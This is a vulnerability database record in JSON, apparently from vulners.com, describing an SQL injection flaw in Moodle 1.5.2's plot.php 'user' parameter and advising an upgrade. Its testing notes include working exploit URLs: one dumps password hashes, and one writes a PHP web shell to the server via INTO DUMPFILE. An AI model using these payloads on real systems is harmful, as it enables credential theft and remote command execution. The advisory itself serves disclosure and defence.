{"type": "osvdb", "published": "2005-11-10T07:03:44", "href": "https://vulners.com/osvdb/OSVDB:20749", "hashmap": [{"key": "affectedSoftware", "hash": "2993f8398daadf87c8c21d5afa1e996e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "a388af343106b99defbc3ee738809a98"}, {"key": "href", "hash": "6e6165121227914ef59738ead1e0a763"}, {"key": "modified", "hash": "a0c1466a81ec19c5659bb1384ccb3802"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "a0c1466a81ec19c5659bb1384ccb3802"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "17939f0b37aa78ee6023c3f7a9f156d5"}, {"key": "title", "hash": "c62f7dbb9e92e529449fd3d6bc76d8e0"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "bulletinFamily": "software", "cvss": {"vector": "NONE", "score": 0.0}, "viewCount": 1, "history": [], "edition": 1, "objectVersion": "1.2", "reporter": "rgod(retrogod@aliceposta.it)", "title": "Moodle plot.php user Variable SQL Injection", "affectedSoftware": [{"operator": "eq", "version": "1.5.2", "name": "Moodle"}], "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2017-04-28T13:20:17"}, "dependencies": {"references": [], "modified": "2017-04-28T13:20:17"}, "vulnersScore": 0.5}, "references": [], "id": "OSVDB:20749", "hash": "475bf67afe51d1570e5f6d2f97f24dc74c41d5e1f53d0ca8580ab03a9d83e81c", "lastseen": "2017-04-28T13:20:17", "cvelist": [], "modified": "2005-11-10T07:03:44", "description": "## Vulnerability Description\nMoodle contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the plot.php script not properly sanitizing user-supplied input to the \"user\" variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 1.6dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMoodle contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the plot.php script not properly sanitizing user-supplied input to the \"user\" variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nto view user/admin password hashes:\nhttp://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0.0.1&user='or%20isnull(1/0)/*\n\nto inject a shell:\nhttp://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0.0.1&user='UNION\n%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n'<?php%20system($_GET[cmd]);%20?>%20',0,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../\n../www/moodle/shell.php'%20FROM%20mdl_user/*\n## References:\nVendor URL: http://moodle.org/\nSecurity Tracker: 1015181\n[Secunia Advisory ID:17526](https://secuniaresearch.flexerasoftware.com/advisories/17526/)\n[Related OSVDB ID: 20748](https://vulners.com/osvdb/OSVDB:20748)\n[Related OSVDB ID: 20750](https://vulners.com/osvdb/OSVDB:20750)\nOther Advisory URL: http://rgod.altervista.org/moodle16dev.html\nGeneric Exploit URL: http://www.milw0rm.com/id.php?id=1312\n"}

{}